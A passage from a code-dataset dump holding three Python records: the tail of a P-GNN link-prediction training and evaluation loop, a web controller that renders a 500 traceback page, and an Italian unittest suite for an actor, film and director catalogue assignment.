enumerate(data_list[:effective_len]):\n if args.permute:\n preselect_anchor(data, layer_num=args.layer_num, anchor_num=args.anchor_num, device=device)\n print(\"Damn\",data.dists_max.shape)\n out = model(data)\n print(\"OUT \" ,out.shape)\n\n # get_link_mask(data,resplit=False) # resample negative links\n edge_mask_train = np.concatenate((data.mask_link_positive_train, data.mask_link_negative_train), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[0,:]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[1,:]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_train.shape[1],], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_train.shape[1],], dtype=pred.dtype)\n label = torch.cat((label_positive,label_negative)).to(device)\n 
print(nodes_first.shape,nodes_second.shape)\n loss = loss_func(pred, label)\n\n # update\n loss.backward()\n if id % args.batch_size == args.batch_size-1:\n if args.batch_size>1:\n # if this is slow, no need to do this normalization\n for p in model.parameters():\n if p.grad is not None:\n p.grad /= args.batch_size\n optimizer.step()\n optimizer.zero_grad()\n\n\n if epoch % args.epoch_log == 0:\n # evaluate\n model.eval()\n loss_train = 0\n loss_val = 0\n loss_test = 0\n correct_train = 0\n all_train = 0\n correct_val = 0\n all_val = 0\n correct_test = 0\n all_test = 0\n auc_train = 0\n auc_val = 0\n auc_test = 0\n emb_norm_min = 0\n emb_norm_max = 0\n emb_norm_mean = 0\n accuracy_train=0\n accuracy_val=0\n accuracy_test=0\n precision_train=0\n precision_val=0\n precision_test=0\n recall_train=0\n recall_val=0\n recall_test=0\n f1_train=0\n f1_val=0\n f1_test=0\n\n\n for id, data in enumerate(data_list):\n out = model(data)\n emb_norm_min += torch.norm(out.data, dim=1).min().cpu().numpy()\n emb_norm_max += torch.norm(out.data, dim=1).max().cpu().numpy()\n emb_norm_mean += torch.norm(out.data, dim=1).mean().cpu().numpy()\n\n # train\n # get_link_mask(data, resplit=False) # resample negative links\n edge_mask_train = np.concatenate((data.mask_link_positive_train, data.mask_link_negative_train), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[0, :]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[1, :]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_train.shape[1], ], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_train.shape[1], ], dtype=pred.dtype)\n label = torch.cat((label_positive, label_negative)).to(device)\n loss_train += loss_func(pred, label).cpu().data.numpy()\n auc_train += roc_auc_score(label.flatten().cpu().numpy(), out_act(pred).flatten().data.cpu().numpy())\n fpr, tpr, thresholds = roc_curve(label.flatten().cpu().numpy(),\\\n out_act(pred).flatten().data.cpu().numpy())\n optimal_idx = np.argmax(tpr - fpr)\n threshold = thresholds[optimal_idx]\n #print(threshold)\n\n label_train_numpy = np.where(label.flatten().cpu().numpy() > threshold , 1 , 0)\n pred_train_numpy = np.where(out_act(pred).flatten().data.cpu().numpy()>threshold, 1 ,0)\n accuracy_train += accuracy_score(label_train_numpy,pred_train_numpy)\n precision_train += precision_score(label_train_numpy,pred_train_numpy)\n recall_train += recall_score(label_train_numpy,pred_train_numpy)\n f1_train += f1_score(label_train_numpy,pred_train_numpy)\n # val\n edge_mask_val = np.concatenate((data.mask_link_positive_val, data.mask_link_negative_val), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_val[0, :]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_val[1, :]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_val.shape[1], ], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_val.shape[1], ], dtype=pred.dtype)\n label = torch.cat((label_positive, label_negative)).to(device)\n loss_val += loss_func(pred, label).cpu().data.numpy()\n auc_val += roc_auc_score(label.flatten().cpu().numpy(), out_act(pred).flatten().data.cpu().numpy())\n label_val_numpy = np.where(label.flatten().cpu().numpy()>threshold,1,0)\n pred_val_numpy = 
np.where(out_act(pred).flatten().data.cpu().numpy()>threshold,1,0)\n accuracy_val += accuracy_score(label_val_numpy, pred_val_numpy)\n precision_val += precision_score(label_val_numpy, pred_val_numpy)\n recall_val += recall_score(label_val_numpy, pred_val_numpy)\n f1_val += f1_score(label_val_numpy, pred_val_numpy)\n\n # test\n edge_mask_test = np.concatenate((data.mask_link_positive_test, data.mask_link_negative_test), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_test[0, :]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_test[1, :]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_test.shape[1], ], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_test.shape[1], ], dtype=pred.dtype)\n label = torch.cat((label_positive, label_negative)).to(device)\n loss_test += loss_func(pred, label).cpu().data.numpy()\n auc_test += roc_auc_score(label.flatten().cpu().numpy(), out_act(pred).flatten().data.cpu().numpy())\n label_test_numpy = np.where(label.flatten().cpu().numpy()>threshold,1,0)\n pred_test_numpy = np.where(out_act(pred).flatten().data.cpu().numpy()>threshold,1,0)\n accuracy_test += accuracy_score(label_test_numpy, pred_test_numpy)\n precision_test += precision_score(label_test_numpy, pred_test_numpy)\n recall_test += recall_score(label_test_numpy, pred_test_numpy)\n f1_test += f1_score(label_test_numpy, pred_test_numpy)\n\n loss_train /= id+1\n loss_val /= id+1\n loss_test /= id+1\n emb_norm_min /= id+1\n emb_norm_max /= id+1\n emb_norm_mean /= id+1\n auc_train /= id+1\n auc_val /= id+1\n auc_test /= id+1\n accuracy_train /= id+1\n accuracy_val /= id+1\n accuracy_test /= id+1\n precision_train /= id+1\n precision_val /= id+1\n precision_test /= id+1\n recall_train /= id+1\n recall_val /= id+1\n recall_test /= id+1\n f1_train /= id+1\n f1_val /= id+1\n f1_test /= id+1\n\n print(\"\\n\",repeat, epoch, 'Loss {:.4f}'.format(loss_train), 'Train AUC: {:.4f}'.format(auc_train),\n 'Val AUC: {:.4f}'.format(auc_val), 'Test AUC: {:.4f}'.format(auc_test))\n print(repeat, epoch, 'Train Acc {:.4f}'.format(accuracy_train), 'Val Acc: {:.4f}'.format(accuracy_val),\n 'Test Acc: {:.4f}'.format(accuracy_test), 'Train prec: {:.4f}'.format(precision_train), \\\n 'Val prec: {:.4f}'.format(precision_val),'Test prec: {:.4f}'.format(precision_test))\n print(repeat, epoch, 'Train Rec {:.4f}'.format(recall_train),\n 'Val Rec: {:.4f}'.format(recall_val),\n 'Test Rec: {:.4f}'.format(recall_test), 'Train F1: {:.4f}'.format(f1_train), \\\n 'Val F1: {:.4f}'.format(f1_val), 'Test F1: {:.4f}'.format(f1_test))\n\n writer_train.add_scalar('repeat_' + str(repeat) + '/auc_'+dataset_name, auc_train, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/loss_'+dataset_name, loss_train, epoch)\n writer_val.add_scalar('repeat_' + str(repeat) + '/auc_'+dataset_name, auc_val, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/loss_'+dataset_name, loss_val, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/auc_'+dataset_name, auc_test, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/loss_'+dataset_name, loss_test, epoch)\n\n writer_train.add_scalar('repeat_' + str(repeat) + '/acc_' + dataset_name, accuracy_train, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/prec_' + dataset_name, precision_train, epoch)\n writer_val.add_scalar('repeat_' + str(repeat) + '/acc_' + dataset_name, accuracy_val, epoch)\n 
writer_train.add_scalar('repeat_' + str(repeat) + '/prec_' + dataset_name, precision_val, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/acc_' + dataset_name, accuracy_test, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/prec_' + dataset_name, precision_val, epoch)\n\n writer_train.add_scalar('repeat_' + str(repeat) + '/rec_' + dataset_name, recall_train, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/f1_' + dataset_name, f1_train, epoch)\n writer_val.add_scalar('repeat_' + str(repeat) + '/rec_' + dataset_name, recall_val, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/f1_' + dataset_name, f1_val, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/rec_' + dataset_name, recall_test, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/f1_' + dataset_name, f1_test, epoch)\n\n\n writer_test.add_scalar('repeat_' + str(repeat) + '/emb_min_'+dataset_name, emb_norm_min, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/emb_max_'+dataset_name, emb_norm_max, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/emb_mean_'+dataset_name, emb_norm_mean, epoch)\n\n result_val.append(auc_val)\n result_auc.append(auc_test)\n result_acc.append(accuracy_test)\n result_prec.append(precision_test)\n result_rec.append(recall_test)\n result_f1.append(f1_test)\n\n\n result_val = np.array(result_val)\n result_auc = np.array(result_auc)\n index = np.argmax(result_val)\n results_auc.append(result_auc[index])\n results_acc.append(result_acc[index])\n results_prec.append(result_prec[index])\n results_rec.append(result_rec[index])\n results_f1.append(result_f1[index])\n\n\n\n results_auc = np.array(results_auc)\n results_acc = np.array(results_acc)\n results_prec = np.array(results_prec)\n results_rec = np.array(results_rec)\n results_f1 = np.array(results_f1)\n print('-----------------Final-------------------')\n #print(results_mean, results_std)\n with open('results/{}_{}_{}_layer{}_approximate{}.txt'.format(args.task,args.model,dataset_name,args.layer_num,args.approximate), 'w') as f:\n f.write('AUC : {}, {}\\n'.format(np.mean(results_auc).round(6), np.std(results_auc).round(6)))\n f.write('ACC : {}, {}\\n'.format(np.mean(results_acc).round(6), np.std(results_acc).round(6)))\n f.write('PREC : {}, {}\\n'.format(np.mean(results_prec).round(6), np.std(results_prec).round(6)))\n f.write('REC : {}, {}\\n'.format(np.mean(results_rec).round(6), np.std(results_rec).round(6)))\n f.write('F1 : {}, {}\\n'.format(np.mean(results_f1).round(6), np.std(results_f1).round(6)))\n\n# export scalar data to JSON for external processing\nwriter_train.export_scalars_to_json(\"./all_scalars.json\")\nwriter_train.close()\nwriter_val.export_scalars_to_json(\"./all_scalars.json\")\nwriter_val.close()\nwriter_test.export_scalars_to_json(\"./all_scalars.json\")\nwriter_test.close()\n","sub_path":"P-GNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553177383","text":"__author__ = 'Nuclight.atomAltera'\n\nfrom .import Controller\nimport sys, traceback\n\nclass TracebackController(Controller):\n\tdef __init__(self, environ):\n\t\tsuper(TracebackController, self).__init__(environ, None)\n\n\tdef _process(self):\n\t\ttrace = traceback.format_exception(*sys.exc_info())\n\n\t\tself._response.text =\\\n\t\t'''\n\t\t\n\t\t\t500 - Autoblog fatal error\n\t\t\t\n\t\t\t\t
<h1>500 - Autoblog Internal Error</h1>\n\t\t\t\t<pre>\n\t\t\t\t\t{traceback}\n\t\t\t\t</pre>\n\t\t\t</body>\n\t\t</html>\n\n\t\t'''.format(traceback='<br>'.join(trace).replace('\n', '<br>
'))\n\n\t\tself._response.code = 500\n","sub_path":"controllers/tracebackController.py","file_name":"tracebackController.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201522790","text":"import copy\nimport unittest\nimport testlib\nimport json\nimport random\nfrom ddt import file_data, ddt, data, unpack\n\nfrom program03 import Attore, Film, Regista, leggi_archivio_attori, leggi_archivio_film\n\npippo = 42\n\n@ddt\nclass Test(testlib.TestCase):\n\n @classmethod\n def setUpClass(cls):\n '''Carico i file per avere pezzi di json a disposizione'''\n with open('actors.json', encoding='utf8') as f:\n cls.attori_json = json.load(f)\n with open('films.json', encoding='utf8') as f:\n cls.films_json = json.load(f)\n\n################################################################################\n\n def do_check_attore(self, a, nome, msg=''):\n '''Verifica che l'attore sia proprio quello del catalogo_attori'''\n self.assertEqual(type(a), Attore, f\"Gli attori {msg} devono essere istanze di Attore\")\n a1 = self.attori[nome]\n self.assertEqual(a.nome(), nome, f\"L'attore {msg} non è {nome}\")\n self.assertTrue(a1 is a,\n f\"Gli attori {msg} devono essere le stesse istanze che stanno nel catalogo_attori'\")\n\n def do_check_film(self, f, titolo, msg=''):\n '''Verifica che il film sia proprio quello del catalogo_film'''\n self.assertEqual(type(f), Film, f\"I film {msg} devono essere istanze di Film\")\n f1 = self.films[titolo]\n self.assertEqual(f.titolo(), titolo, f\"Il film {msg} non è {titolo}\")\n self.assertTrue(f1 is f,\n f\"I film {msg} devono essere le stesse istanze che stanno nel catalogo_films'\")\n\n def do_check_regista(self, r, nome, msg=''):\n '''Verifica che il regista sia proprio quello del catalogo_registi'''\n self.assertEqual(type(r), Regista, f\"I registi {msg} devono essere istanze di Regista\")\n r1 = self.registi[nome]\n self.assertEqual(r.nome(), nome, f\"Il regista {msg} non è {nome}\")\n self.assertTrue(r1 is r,\n f\"I registi {msg} devono essere le stesse istanze che stanno nel catalogo_registi'\")\n\n def do_test_gruppo_attori(self, attori, tipo, nomi, msg=''):\n '''Verifica che gli attori tornati siano solo quelli indicati'''\n self.assertEqual(type(attori), tipo, f\"{msg} deve tornare un {tipo}\")\n self.assertEqual(len(attori), len(nomi), f\"Gli attori tornati devono essere {len(nomi)}\")\n for a in attori:\n self.assertTrue(a.nome() in nomi, f\"L'attore {a.nome()} non va tornato da {msg}\")\n self.do_check_attore(a, a.nome(), f'tornato da {msg}')\n for nome in nomi:\n a = self.attori[nome]\n self.assertTrue(a in attori, f\"L'attore {nome} manca nell'elenco tornato da {msg})\")\n\n def do_test_gruppo_film(self, films, tipo, titoli, msg=''):\n '''Verifica che i film tornati siano solo quelli indicati'''\n self.assertEqual(type(films), tipo, f\"{msg} deve tornare un {tipo}\")\n self.assertEqual(len(films), len(titoli), f\"I film tornati devono essere {len(titoli)}\")\n for f in films:\n self.assertTrue(f.titolo() in titoli, f\"Il film {f.titolo()} non va tornato da {msg}\")\n self.do_check_film(f, f.titolo(), f'tornato da {msg}')\n for t in titoli:\n f = self.films[t]\n self.assertTrue(f in films, f\"Il film {t} manca nell'elenco tornato da {msg})\")\n\n def do_test_gruppo_registi(self, registi, tipo, nomi, msg=''):\n '''Verifica che gli attori tornati siano solo quelli indicati'''\n self.assertEqual(type(registi), tipo, f\"{msg} deve tornare un {tipo}\")\n 
self.assertEqual(len(registi), len(nomi), f\"I registi tornati devono essere {len(nomi)}\")\n for r in registi:\n self.assertTrue(r.nome() in nomi, f\"Il regista {r.nome()} non va tornato da {msg}\")\n self.do_check_regista(r, r.nome(), f'tornato da {msg}')\n for nome in nomi:\n r = self.registi[nome]\n self.assertTrue(r in registi, f\"Il regista {nome} manca nell'elenco tornato da {msg})\")\n\n################################################################################\n\n @data(\n ['actors.json', 22233],\n )\n @unpack\n def test_00_load_attori(self, filename, N):\n '''controlla che vengano caricati gli attori'''\n with self.ignored_function('builtins.print'), self.ignored_function('pprint.pprint'):\n attori = leggi_archivio_attori(filename)\n self.assertEqual(type(attori), dict, \"Il risultato non è un dizionario\")\n self.assertEqual(len(attori), N, f\"Il dizionario creato da {filename} deve contenere {N} attori\")\n for a in attori.values():\n self.assertEqual(type(a), Attore)\n Test.attori = attori\n\n @data(\n ['films.json', 2359, 1250],\n )\n @unpack\n def test_01_load_films(self, filename, NF, NR):\n '''controlla che vengano caricati i films e i registi'''\n with self.ignored_function('builtins.print'), self.ignored_function('pprint.pprint'):\n res = leggi_archivio_film(filename, Test.attori)\n self.assertEqual(type(res), tuple, \"il risultato non è una tupla\")\n self.assertEqual(len(res), 2, \"il risultato non ha due elementi\")\n films, registi = res\n self.assertEqual(type(films), dict, \"Il catalogo_film non è un dizionario\")\n self.assertEqual(len(films), NF, f\"Il dizionario creato da {filename} deve contenere {NF} films\")\n self.assertEqual(type(registi), dict, \"Il catalogo_registi non è un dizionario\")\n self.assertEqual(len(registi), NR, f\"Il catalogo_registi creato da {filename} deve contenere {NR} registi\")\n for f in films.values():\n self.assertEqual(type(f), Film, \"Tutti i valori di catalogo_film devono essere Film\")\n for r in registi.values():\n self.assertEqual(type(r), Regista, \"Tutti i valori di catalogo_registi devono essere Regista\")\n Test.films = films\n Test.registi = registi\n\n # TODO: controllo su almeno un paio di attori, film e registi\n\n################################################################################\n\n def do_test_Attore_dati_base(self, attore, nome, eta, genere, truename):\n '''Verifica che l'attore contenga i dati base'''\n self.assertEqual(type(attore), Attore, \"Non è una istanza di Attore\")\n self.assertEqual(attore.nome(), nome, f\"Il nome dell'attore non è {nome}\")\n self.assertEqual(attore.eta(), eta, f\"L'attore {nome} deve avere {eta} anni\")\n self.assertEqual(attore.genere(), genere, f\"L'attore {nome} è di genere {genere}\")\n self.assertEqual(attore.vero_nome(),truename, f\"L'attore {nome} si chiamava {truename}\")\n\n @data(\n # name age sex vero_nome\n ['Marilyn Monroe', 37, 'F', 'Norma Jeane Mortenson' ],\n ['David Bowie', 72, 'M', 'David Robert Haywood Jones' ],\n ['Marlon Brando', 81, 'M', 'Marlon Brando Jr.' 
],\n ['Benedict Cumberbatch', 43, 'M', 'Benedict Timothy Carlton Cumberbatch' ],\n )\n @unpack\n def test_10_new_Attore(self, nome, eta, genere, truename):\n '''Controlla che l'attore venga creato correttamente da un blocco di dati json'''\n json_data = self.attori_json[nome]\n attore = Attore(json_data)\n self.do_test_Attore_dati_base(attore, nome, eta, genere, truename)\n self.assertEqual(attore.films(), set(),\n f\"I film dell'attore all'inizio devono essere un insieme vuoto\")\n\n################################################################################\n\n @data(\n # nome eta sex vero_nome\n # titoli\n ['Marilyn Monroe', 37, 'F', 'Norma Jeane Mortenson' ],\n ['Scarlett Johansson', 35, 'F', 'Scarlett Ingrid Johansson' ],\n ['Benedict Cumberbatch', 43, 'M', 'Benedict Timothy Carlton Cumberbatch'],\n )\n @unpack\n def test_11_Attore_from_catalogo_attori(self, nome, eta, genere, vnome):\n '''Controlla che l'attore sia stato creato correttamente dal caricamento del file'''\n self.assertTrue(nome in self.attori, f\"L'attore {nome} deve apparire nel catalogo_attori\")\n attore = self.attori[nome]\n self.do_test_Attore_dati_base(attore, nome, eta, genere, vnome)\n\n @data(\n # nome\n ['Marilyn Monroe',\n ['The Misfits', 'All About Eve', 'Monkey Business', 'The Seven Year Itch', 'Niagara',\n 'The Asphalt Jungle', 'Some Like It Hot', 'Gentlemen Prefer Blondes']],\n ['Scarlett Johansson',\n ['Vicky Cristina Barcelona', \"The Man Who Wasn't There\", 'Lost in Translation',\n 'The Avengers', 'The Prestige', 'Ghost World', 'We Bought a Zoo', 'Girl with a Pearl Earring',\n 'Iron Man 2', 'Match Point', 'A Love Song for Bobby Long']],\n ['Benedict Cumberbatch',\n ['The Whistleblower', 'War Horse', 'Atonement', 'Amazing Grace', 'Tinker Tailor Soldier Spy']],\n )\n @unpack\n # Attore.films()\n def test_12_Attore_films(self, nome, titoli ):\n attore = self.attori[nome]\n films = attore.films()\n self.do_test_gruppo_film(films, set, titoli, f\"Attore.films()\")\n\n @data(\n # nome NA\n ['Marilyn Monroe', 84],\n ['Scarlett Johansson', 148],\n ['Benedict Cumberbatch', 67],\n )\n @unpack\n # Attore.coprotagonisti()\n def test_13_Attore_numero_coprotagonisti(self, nome, NA):\n attore = self.attori[nome]\n attori = attore.coprotagonisti()\n self.assertEqual(len(attori), NA, f\"L'attore {nome} ha avuto {NA} coprotagonisti\")\n for a in attori:\n self.do_check_attore(a, a.nome(), f'con cui ha lavorato {nome}')\n\n @data(\n # nome registi\n ['Marilyn Monroe',\n ['Howard Hawks', 'Henry Hathaway', 'Billy Wilder', 'Joseph L. 
Mankiewicz', 'John Huston']\n ],\n ['Scarlett Johansson',\n ['Woody Allen', 'Terry Zwigoff', 'Shainee Gabel', 'Joel Coen', 'Christopher Nolan', 'Peter Webber',\n 'Joss Whedon', 'and 1 more credit', 'Sofia Coppola', 'Cameron Crowe', 'Jon Favreau']\n ],\n ['Benedict Cumberbatch',\n ['Tomas Alfredson', 'Larysa Kondracki', 'Michael Apted', 'Steven Spielberg', 'Joe Wright']],\n )\n @unpack\n # Attore.registi()\n def test_14_Attore_registi(self, nome, nomi):\n attore = self.attori[nome]\n registi = attore.registi()\n self.do_test_gruppo_registi(registi, set, nomi, f\"Attore.registi()\")\n\n @data(\n # nome PR\n ['Marilyn Monroe', 'Billy Wilder' ],\n ['Scarlett Johansson', 'Woody Allen' ],\n ['Benedict Cumberbatch', 'Joe Wright' ],\n )\n @unpack\n # Attore.regista_preferito()\n def test_15_Attore_regista_preferito(self, nome, PR):\n attore = self.attori[nome]\n r = attore.regista_preferito()\n self.do_check_regista(r, PR, f'preferito di {nome}')\n\n @data(\n # nome minD maxD titoli\n ['Marilyn Monroe', 90, 110,\n ['Gentlemen Prefer Blondes',\n 'Niagara',\n 'Monkey Business',\n 'The Seven Year Itch',\n ],\n ],\n ['Scarlett Johansson', 90, 120,\n ['Vicky Cristina Barcelona',\n 'Girl with a Pearl Earring',\n 'Lost in Translation',\n 'Ghost World',\n 'Match Point',\n 'The Man Who Wasn\\'t There',\n 'A Love Song for Bobby Long',\n ],\n ],\n ['Benedict Cumberbatch', 120, None,\n ['Atonement',\n 'Tinker Tailor Soldier Spy',\n 'War Horse',\n ],\n ],\n )\n @unpack\n # Attore.film_durata(minD, maxD)\n def test_16_Attore_film_durata(self, nome, minD, maxD, titoli):\n attore = self.attori[nome]\n films = attore.film_durata(minD, maxD)\n self.do_test_gruppo_film(films, list, titoli)\n self.assertEqual(films, [self.films[t] for t in titoli])\n\n @data(\n # nome coppiette\n ['Scarlett Johansson',\n [('Robert Downey Jr.', 'Scarlett Johansson', 2),\n ('Samuel L. 
Jackson', 'Scarlett Johansson', 2),\n ('Paul Bettany', 'Scarlett Johansson', 2),\n ('Clark Gregg', 'Scarlett Johansson', 2),\n ],\n ],\n ['Woody Allen',\n [('Woody Allen', 'Diane Keaton', 6),\n ('Woody Allen', 'Joan Neuman', 2),\n ('Woody Allen', 'Anjelica Huston', 2),\n ('Woody Allen', 'Helen Hanft', 2),\n ('Woody Allen', 'Janet Margolin', 2),\n ('Woody Allen', 'Julia Louis-Dreyfus', 2),\n ('Woody Allen', 'Stephanie Roth Haberle', 2),\n ('Woody Allen', 'Mia Farrow', 4)\n ]\n ],\n )\n @unpack\n # Attore.in_coppia()\n def test_17_Attore_in_coppia_empty(self, nome, coppiette):\n attore = self.attori[nome]\n\n incoppia = attore.in_coppia()\n # print(\"################\\n\", [ (m.nome(), f.nome(), n) for m,f,n in incoppia] )\n self.assertEqual(type(incoppia), set, \"Attore.in_coppia() deve tornare un set di tuple\")\n for t in incoppia:\n self.assertEqual(len(t), 3, \"Attore.in_coppia() deve tornare un set di terne\")\n male, female, Nf = t\n self.assertEqual(type(male), Attore, \"Attore.in_coppia() deve tornare un set di terne il cui primo elemento è un Attore\")\n self.assertEqual(type(female), Attore, \"Attore.in_coppia() deve tornare un set di terne il cui secondo elemento è un Attore\")\n self.assertEqual(type(Nf), int, \"Attore.in_coppia() deve tornare un set di terne il cui terzo elemento è un int\")\n self.assertEqual(male.genere(), 'M')\n self.assertEqual(female.genere(), 'F')\n terna = male.nome(), female.nome(), Nf\n self.assertTrue(terna in coppiette, f\"La terna {terna} non va tornata\")\n self.do_check_attore(male, male.nome(), f'tornato da in_coppia()')\n self.do_check_attore(female, female.nome(), f'tornato da in_coppia()')\n for M,F,N in coppiette:\n MM = self.attori[M]\n FF = self.attori[F]\n terna = MM, FF, N\n self.assertTrue( terna in incoppia, f\"La terna {terna} manca nell'elenco tornato da in_coppia()\")\n\n @data(\n # nome partner titoli\n ['Marilyn Monroe', 'Cary Grant', ['Monkey Business']],\n ['Scarlett Johansson', 'Robert Downey Jr.', ['Iron Man 2', 'The Avengers',]],\n ['Benedict Cumberbatch', 'Keira Knightley', ['Atonement', ]],\n )\n @unpack\n # Attore.in_coppia(partner)\n def test_18_Attore_in_coppia_partner(self, nome, partner, titoli):\n attore = self.attori[nome]\n films = attore.in_coppia(partner)\n self.do_test_gruppo_film(films, set, titoli, f'Attore.in_coppia({partner})')\n\n # TODO: what else?\n\n @data(\n ['Marcello Mastroianni', 'France'],\n ['Woody Allen', 'USA' ],\n )\n @unpack\n def test_19_Attore_luogo_preferito(self, nome, LP):\n # Attore.attore_preferito()\n attore = self.attori[nome]\n luogo = attore.luogo_preferito()\n self.assertEqual(luogo, LP, f\"Il luogo preferito di {nome} è {LP}\")\n\n################################################################################\n\n def do_check_Film_dati_base(self, film, titolo, durata, anno, posti):\n '''Verifica che i dati di base del film ci siano'''\n posti = set(posti)\n self.assertEqual(type(film), Film, f\"{film} non è una istanza di Film\")\n self.assertEqual(film.titolo(), titolo, f\"Il titolo del Film non è {titolo}\")\n self.assertEqual(film.durata(), durata, f\"Il film {titolo} dovrebbe durare {durata} minuti\")\n self.assertEqual(film.anno(), int(anno), f\"Il film {titolo} è stato girato nel {anno}\")\n self.assertEqual(film.luoghi(), posti, f\"Il film {titolo} è stato girato in {posti}\")\n\n################################################################################\n\n @data(\n # titolo durata\n ['Blazing Saddles;1974', 93, ['USA'] ],\n ['Artificial Intelligence: AI;2001', 146, 
['USA'] ],\n ['V for Vendetta;2005', 132, ['USA', 'UK', 'Germany'] ],\n # altri con durate strane\n )\n @unpack\n def test_20_new_Film(self, key, durata, posti):\n '''Controlla che il film venga creato correttamente da un blocco di dati json'''\n json_data = self.films_json[key]\n titolo, anno = key.split(';')\n film = Film(json_data)\n self.do_check_Film_dati_base(film, titolo, durata, anno, posti)\n self.assertEqual(film.attori(), set(), f\"Gli attori del film all'inizio devono essere un insieme vuoto\")\n self.assertEqual(film.registi(),set(), f\"I registi del film all'inizio devono essere un insieme vuoto\")\n\n # TODO: what else?\n\n################################################################################\n\n @data(\n # titolo min luoghi\n ['Blazing Saddles;1974', 93, ['USA'] ],\n ['Artificial Intelligence: AI;2001', 146, ['USA'] ],\n ['V for Vendetta;2005', 132, ['USA', 'UK', 'Germany'] ],\n ['Underground;1995', 167, ['Federal Republic of Yugoslavia', 'France', 'Germany',\n 'Bulgaria', 'Czech Republic', 'Hungary']],\n )\n @unpack\n def test_21_Film_from_catalogo_film(self, key, durata, posti):\n '''Controlla che il film sia nel dizionario catalogo_film'''\n titolo, anno = key.split(';')\n self.assertTrue(titolo in self.films, f\"Nel catalogo dei film ci dev'essere {titolo}\")\n film = self.films[titolo]\n self.do_check_Film_dati_base(film, titolo, durata, anno, posti)\n\n @data(\n # titolo\n ['Blazing Saddles;1974',\n ['Carol Arthur', 'Cleavon Little', 'Mel Brooks', 'George Furth', 'Richard Collier', 'David Huddleston',\n 'Slim Pickens', 'Madeline Kahn', 'Liam Dunn', 'Jack Starrett', 'Gene Wilder', 'Burton Gilliam',\n 'Harvey Korman', 'Alex Karras', 'John Hillerman']],\n ['Artificial Intelligence: AI;2001',\n ['Theo Greenly', 'Ken Leung', 'Jude Law', 'William Hurt', 'Clark Gregg', 'Haley Joel Osment',\n 'April Grace', 'Tom Gallop', 'Kevin Sussman', 'Eugene Osment', \"Frances O'Connor\",\n 'Sabrina Grdevich', 'Jake Thomas', 'Sam Robards', 'Matt Winston']],\n )\n @unpack\n def test_22_Film_attori(self, key, nomiA):\n titolo, anno = key.split(';')\n film = self.films[titolo]\n attori = film.attori()\n self.do_test_gruppo_attori( attori, set, nomiA, f\"Film.attori()\")\n\n @data(\n # titolo registi\n ['Blazing Saddles;1974', ['Mel Brooks']],\n ['Artificial Intelligence: AI;2001', ['Steven Spielberg']],\n )\n @unpack\n def test_23_Film_registi(self, key, nomiR):\n titolo, anno = key.split(';')\n film = self.films[titolo]\n registi = film.registi()\n # print('REGISTI', [r.nome() for r in registi])\n self.do_test_gruppo_registi(registi, set, nomiR, f\"Film.registi()\")\n\n # TODO: what else?\n\n################################################################################\n\n @data(\n ['Michelangelo Antonioni', ],\n ['Woody Allen', ],\n )\n @unpack\n def test_30_new_Regista(self, nome):\n '''Controlla che il film venga creato correttamente da un blocco di dati json'''\n regista = Regista(nome)\n self.assertEqual(type(regista), Regista, \"Non è stata creata una istanza di Regista\")\n self.assertEqual(regista.nome(), nome, f\"Il nome del Regista non è {nome}\")\n self.assertEqual(regista.films(), set(), f\"I film del regista all'inizio devono essere un insieme vuoto\")\n\n # TODO: what else?\n\n################################################################################\n\n @data(\n ['Michelangelo Antonioni', 7, 16],\n ['Woody Allen', 25, 43],\n )\n @unpack\n def test_31_Regista_from_catalogo_registi(self, nome, NF, anni):\n '''Controlla che il film sia stato creato 
